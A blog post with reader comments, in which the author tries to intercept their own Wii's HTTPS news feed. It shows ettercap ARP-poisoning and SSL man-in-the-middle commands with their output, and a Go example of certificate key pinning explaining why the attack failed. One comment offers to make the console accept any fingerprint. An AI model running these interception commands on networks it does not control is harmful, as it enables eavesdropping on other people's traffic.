My Wii is more intelligent than me

Today I was thinking about playing with my Wii in a different way, but in the end it was me who got played :)

I wanted to intercept the connection my Wii establishes with the Nintendo server and modify the news stream, so I could change the headlines and show off in front of my girlfriend. Things you do on a rainy Sunday afternoon…

First step: ARP poison both the Wii and the router to sniff the traffic.

root@bt:~# ettercap -T -q -i eth0 -M arp /192.168.1.1/ /192.168.1.254/

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0… (Ethernet)

eth0 ->       2A:04:73:94:A6:0A      192.168.1.10     255.255.255.0

Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)…

* |==================================================>| 100.00 %

2 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : 192.168.1.254 E8:4E:CE:10:6D:E6

GROUP 2 : 192.168.1.1 00:23:69:2F:C1:61
Starting Unified sniffing…

[…]

root@bt:~# tcpdump -i eth0 -nvX -s 0 -w wii.dmp host 192.168.1.254
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

[…]

Unfortunately all we get is a lot of HTTPS traffic (TLS v1 encrypted). Well, I didn’t really think the Wii was going to send everything unencrypted, did I? …

The next thought was to modify the attack in order to sniff the contents of the TLS session. Ettercap itself is able to perform this kind of SSL man-in-the-middle attack.

From the ettercap man page:

SSL MITM ATTACK
       While performing the SSL mitm attack, ettercap substitutes the real ssl
       certificate with its own. The fake certificate is created  on  the  fly
       and  all  the fields are filled according to the real cert presented by
       the server. Only the issuer is modified and signed with the private key
       contained  in  the 'etter.sll.crt' file. If you want to use a different
       private key you have to regenerate this file.

This way, the attacking machine starts two SSL connections:

1. One with the server. This is a normal SSL connection, where we act as a client and use the public key presented in the server’s certificate to encrypt the data.

2. One with the client, where we impersonate the server using a fake (almost identical) certificate.

root@bt:~# ettercap -Tq -M arp:remote,oneway /192.168.1.254/ /192.168.1.1/

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0… (Ethernet)

eth0 -> 2A:04:73:94:A6:0A 192.168.1.10 255.255.255.0

Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)…

* |==================================================>| 100.00 %

2 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : 192.168.1.254 E8:4E:CE:10:6D:E6

GROUP 2 : 192.168.1.1 00:23:69:2F:C1:61
Starting Unified sniffing…

This trick usually works with humans because… well, because certificates and all this technology are a fucked up system and we are so used to invalid certificates and to clicking “Ok”.

But my Wii is more intelligent than me and must somehow check the fingerprint of the public key in the certificate. All I got was an error message on my TV explaining that the connection had failed :(

The traffic capture is of course far more verbose: in the capture below you can see how I present the fake certificate and my Wii answers with a Certificate Unknown error message.
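To show why ettercap’s on-the-fly substitute fails against a client that checks the key rather than the certificate’s fields, here is an added Go example (my own illustration, not code from this post, from ettercap or from Nintendo): a client config pins the SHA-256 of the server’s SubjectPublicKeyInfo and rejects a look-alike certificate minted for the same host under a fresh key. The host name news.example, the self-signed test certificates and the pinning callback are assumptions made for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// mintCert issues a self-signed certificate for host under a freshly generated key (a constructed
// test cert). Minting a second one for the same host is what ettercap does on the fly: every
// visible field is copied, but the key behind the certificate is the attacker's.
func mintCert(host string) (*x509.Certificate, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: host},
		DNSNames: []string{host}, NotBefore: time.Now(), NotAfter: time.Now().Add(time.Hour)}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, pub, priv)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}
// spkiPin is the SHA-256 of the SubjectPublicKeyInfo, the value a pinning client stores ahead of time.
func spkiPin(c *x509.Certificate) [32]byte { return sha256.Sum256(c.RawSubjectPublicKeyInfo) }
// pinnedClientConfig builds a client config whose trust decision is the pin check alone. Chain validation
// is off so the example needs no CA store; a real client keeps it on and adds the pin as a second gate.
func pinnedClientConfig(pin [32]byte) *tls.Config {
	return &tls.Config{InsecureSkipVerify: true,
		VerifyPeerCertificate: func(raw [][]byte, _ [][]*x509.Certificate) error {
			leaf, err := x509.ParseCertificate(raw[0])
			if err == nil && spkiPin(leaf) != pin { // every other field may match; the key does not
				err = errors.New("certificate unknown: leaf key is not the pinned key")
			}
			return err
		}}
}

func main() {
	genuine, _ := mintCert("news.example") // the server's real certificate
	clone, _ := mintCert("news.example")   // the substitute a MITM presents
	cfg := pinnedClientConfig(spkiPin(genuine))
	fmt.Println("genuine:", cfg.VerifyPeerCertificate([][]byte{genuine.Raw}, nil), "clone:", cfg.VerifyPeerCertificate([][]byte{clone.Raw}, nil))
}
```

Running it prints a nil error for the genuine certificate and the “certificate unknown” error for the clone, which is the decision the Wii took before the handshake ever reached the news feed.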

Bottom line, I couldn’t play but I’m happy the security of my Wii is taken seriously.

Thumbs up Nintendo!


2 thoughts on “My Wii is more intelligent than me”

  1. Hey, it is cool to see that you are at least trying stuff like this. I thought it was an interesting idea. That SSL certificate is probably somewhere embedded on the hard drive in the Wii. I bet you could find it if you really wanted to. I doubt they update it.

  2. Maybe we can force the Wii to accept any fingerprint.
    I could do it if you could find Nintendo’s fingerprint. (not sure for Wii channels, but at least for games)
    Contact me if you’re interested :)
